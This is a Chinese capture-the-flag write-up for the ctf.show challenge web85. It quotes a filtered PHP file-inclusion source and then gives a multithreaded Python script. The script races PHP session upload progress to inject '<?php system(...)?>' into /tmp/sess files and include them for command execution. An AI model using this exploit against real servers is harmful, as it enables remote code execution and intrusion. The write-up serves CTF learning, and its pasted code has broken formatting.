- 代码审计
```php <?php if(isset($_GET[‘file’])){ $file = $_GET[‘file’]; $file = str_replace(“php”, “???”, $file); $file = str_replace(“data”, “???”, $file); $file = str_replace(“:”, “???”, $file); $file = str_replace(“.”, “???”, $file); if(file_exists($file)){
}$content = file_get_contents($file);if(strpos($content, "<")>0){die("error");}include($file);
}else{ highlightfile(_FILE); }
2. 还是`web82`的原理,但是这里会检测生成的`/tmp/sess_xxxx`文件是否有`<`,如果有就会停止,所以原来的脚本脚本竞争很难成功,我们优化一下,直接构造命令,不再写🐎
```python
# -*- coding: utf-8 -*-
'''
@Time : 2021/7/8 16:49
@Author : Seals6
@File : web85.py
@contact: 972480239@qq.com
@blog: seals6.github.io
-*- 功能说明 -*-
-*- 更新说明 -*-
'''
import io
import requests
import threading
url = 'http://771fcdbe-7f88-48f1-ba7d-c2df30183f61.challenge.ctf.show:8080/'
def write(session):
data = {
'PHP_SESSION_UPLOAD_PROGRESS': '<?php system("tac f*");?>seals6'
}
while True:
f = io.BytesIO(b'a' * 1024 * 10)
response = session.post(url,cookies={'PHPSESSID': 'flag'}, data=data, files={'file': ('dota.txt', f)})
def read(session):
while True:
response = session.get(url+'?file=/tmp/sess_flag')
if 'seals6' in response.text:
print(response.text)
break
else:
print('retry')
if __name__ == '__main__':
session = requests.session()
for i in range(30):
threading.Thread(target=write, args=(session,)).start()
for i in range(30):
threading.Thread(target=read, args=(session,)).start()
若有收获,就点个赞吧
0 人点赞
